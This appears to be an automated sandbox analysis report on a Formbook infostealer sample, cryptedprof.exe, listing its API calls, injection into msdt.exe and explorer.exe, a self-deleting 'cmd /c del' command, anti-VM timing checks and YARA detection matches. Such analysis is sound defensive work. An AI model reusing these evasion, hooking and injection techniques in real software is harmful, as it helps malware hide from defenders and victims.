          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D96D0 NtCreateKey,LdrInitializeThunk,7_2_046D96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9710 NtQueryInformationToken,LdrInitializeThunk,7_2_046D9710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9FE0 NtCreateMutant,LdrInitializeThunk,7_2_046D9FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9780 NtMapViewOfSection,LdrInitializeThunk,7_2_046D9780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DB040 NtSuspendThread,7_2_046DB040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9820 NtEnumerateKey,7_2_046D9820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D98F0 NtReadVirtualMemory,7_2_046D98F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D98A0 NtWriteVirtualMemory,7_2_046D98A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9560 NtWriteFile,7_2_046D9560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9950 NtQueueApcThread,7_2_046D9950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9520 NtWaitForSingleObject,7_2_046D9520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DAD30 NtSetContextThread,7_2_046DAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D95F0 NtQueryInformationFile,7_2_046D95F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D99D0 NtCreateProcessEx,7_2_046D99D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9670 NtQueryInformationProcess,7_2_046D9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A20 NtResumeThread,7_2_046D9A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A00 NtProtectVirtualMemory,7_2_046D9A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9610 NtEnumerateValueKey,7_2_046D9610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A10 NtQuerySection,7_2_046D9A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A80 NtOpenDirectoryObject,7_2_046D9A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9760 NtOpenProcess,7_2_046D9760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9770 NtSetInformationFile,7_2_046D9770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA770 NtOpenThread,7_2_046DA770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9730 NtQueryVirtualMemory,7_2_046D9730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9B00 NtSetValueKey,7_2_046D9B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA710 NtOpenProcessToken,7_2_046DA710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D97A0 NtUnmapViewOfSection,7_2_046D97A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA3B0 NtGetContextThread,7_2_046DA3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E90 NtClose,7_2_02C79E90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E10 NtReadFile,7_2_02C79E10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79F40 NtAllocateVirtualMemory,7_2_02C79F40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79D60 NtCreateFile,7_2_02C79D60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E8A NtClose,7_2_02C79E8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79F3C NtAllocateVirtualMemory,7_2_02C79F3C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79DB4 NtReadFile,7_2_02C79DB4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79D5A NtCreateFile,7_2_02C79D5A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0469B150 appears 35 times
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: String function: 00ABB150 appears 121 times
          Source: cryptedprof.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cryptedprof.exe, 00000001.00000003.327029205.0000000002D3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000001.00000002.335855090.00000000028F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.388818719.0000000000D3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs cryptedprof.exe
          Source: cryptedprof.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404763
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_6FC2421B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,1_2_6FC2421B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,1_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
          Source: C:\Users\user\Desktop\cryptedprof.exe File created: C:\Users\user\AppData\Local\Temp\nsv1C7.tmp
          Source: cryptedprof.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cryptedprof.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\cryptedprof.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: cryptedprof.exe ReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\cryptedprof.exe File read: C:\Users\user\Desktop\cryptedprof.exe
          Source: unknown Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknown Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\cryptedprof.exe Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: C:\Users\user\Desktop\cryptedprof.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: cryptedprof.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cryptedprof.exe, msdt.exe
          Source: Binary string: msdt.pdb source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\cryptedprof.exe Unpacked PE file: 3.2.cryptedprof.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_70991A98
          Source: 8chdn.dll.1.dr Static PE information: section name: .code
          Source: initial sample Static PE information: section name: .data entropy: 7.23183783874
          Source: C:\Users\user\Desktop\cryptedprof.exe File created: C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll
          Source: C:\Users\user\Desktop\cryptedprof.exe File created: C:\Users\user\AppData\Local\Temp\8chdn.dll

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
          Source: C:\Users\user\Desktop\cryptedprof.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\cryptedprof.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000002C698E4 second address: 0000000002C698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000002C69B5E second address: 0000000002C69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 3_2_00409A90 rdtsc 3_2_00409A90
          Source: C:\Windows\explorer.exe TID: 4928 Thread sleep time: -58000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405A15
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 1_2_004065C1 FindFirstFileA,FindClose,1_2_004065C1
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000002.601400852.000000000461E000.00000004.00000001.sdmp Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60200-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&%
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345049804.000000000461E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.349105982.0000000006410000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.349105982.0000000006410000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\cryptedprof.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\cryptedprof.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 3_2_00409A90 rdtsc 3_2_00409A90
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 3_2_0040ACD0 LdrLoadDll,3_2_0040ACD0
          Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_70991A98
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov ecx, dword ptr fs:[00000030h]3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov ecx, dword ptr fs:[00000030h]3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov eax, dword ptr fs:[00000030h]3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
